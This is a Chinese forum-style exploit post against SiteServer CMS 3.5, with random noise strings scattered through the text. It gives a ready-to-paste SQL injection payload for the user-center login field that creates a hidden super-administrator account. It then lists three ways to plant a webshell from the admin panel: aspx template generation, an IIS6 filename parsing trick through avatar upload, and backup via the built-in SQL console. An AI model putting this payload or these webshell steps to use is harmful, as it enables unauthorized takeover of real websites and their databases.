经测试秒杀最新的3.5版
7 l, c9 {, \* H+ B- d- W3 f6 a. V& r! O! t" c; F4 o
stieserver官网:www.siteserver.cn' }2 N: F/ |4 p& X8 K
1 S+ z; U9 E: z! Y4 Y/ ]' ^
% L8 n) d7 K3 V( W0 x" c; _8 o
, F/ n6 c- O7 v4 Q" `4 P' l6 N( CEXP:! @; n6 c* j: y, q: y6 N# I `
+ z# ~6 P; ^1 N0 t; G* o( Z1 U直接访问UserCenter/login.aspx
) n) p. N8 h1 D) \" Z B9 m
3 U$ m* R$ K9 C Z * {) J, P; Q- T% f8 L
$ a0 y( @ J d8 T9 V- |0 i& c# C用户名处输入:* F3 f6 q# ^7 l5 B
! m6 d0 l8 |. K5 ?123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--& H& v: f) m8 ~7 S# n
6 u1 f1 I0 c" M, L$ V
4 w; D% r8 \3 D. i4 H5 h- v
7 c. p8 S- u+ r密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。# q" q! s9 [2 \& h+ u2 @
. R7 @9 j0 {( e, @* x5 A3 _0 C! V
9 z* h" E: _6 ^
; l$ w% ?& [& S% F之后再访问后台SiteServer/login.aspx用插入的用户登陆
4 Q o: d8 b! T$ q% I0 W5 H# A y" M; O8 @9 O
6 n" |- O& B3 |
% C* g+ N; Z2 C3 F% E1 W后台拿webshell的三种方法:
& Z @9 r) C& Q+ Q3 V2 C" b0 Q/ m
3 q( z& t& ~7 K8 Z# V) e一、0 ]4 q! G) N) d M [
, C+ F0 ]1 J5 C v7 J M站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx" J1 d6 z' U" Z& W, J q7 f ]
* A7 d9 N7 l2 V二、! Y* e% S1 H3 @8 _9 Y) n, E! s2 b
" O5 x) t6 X1 V* F( Z成员权限-》添加用户-》用户名为:1.asp
; r: }8 t3 f& p" v* G/ m8 `+ h# \
8 M0 c% t+ ?1 P+ ahttp://127.0.0.1/usercenter/( L/ x4 T' G$ s( @" V$ {' y
9 T' F5 m+ U+ Y% F9 G用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
. s: |5 K# |0 @% v" H" I% r4 ]0 l! p! Y$ Q# w$ K4 h8 K( q
(ps:后台添加用户时不会验证是否含有非法字符)8 T# {) S/ E. I7 a# s0 O$ f1 Y
# R" A9 x! l/ b) ?2 \' q1 i% I三、
' t* ], D" L6 U3 x3 J1 J
& J, f$ f5 q# E, s X9 Q系统工具-》实用工具-》机器参数查看
; I! p' }. h! I( y4 i可以看到数据库类型、名称,WEB路径
8 M9 [7 Q8 y! j h3 I4 m
. A9 Z+ n5 A6 U; F" F' ~2 J系统工具-》数据库工具-》SQL语句查询
# A a% S0 J( b8 D0 e" k: |& m这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。
1 ]: W" K6 [% k3 p
) F" a1 R$ [% K- e/ H5 S |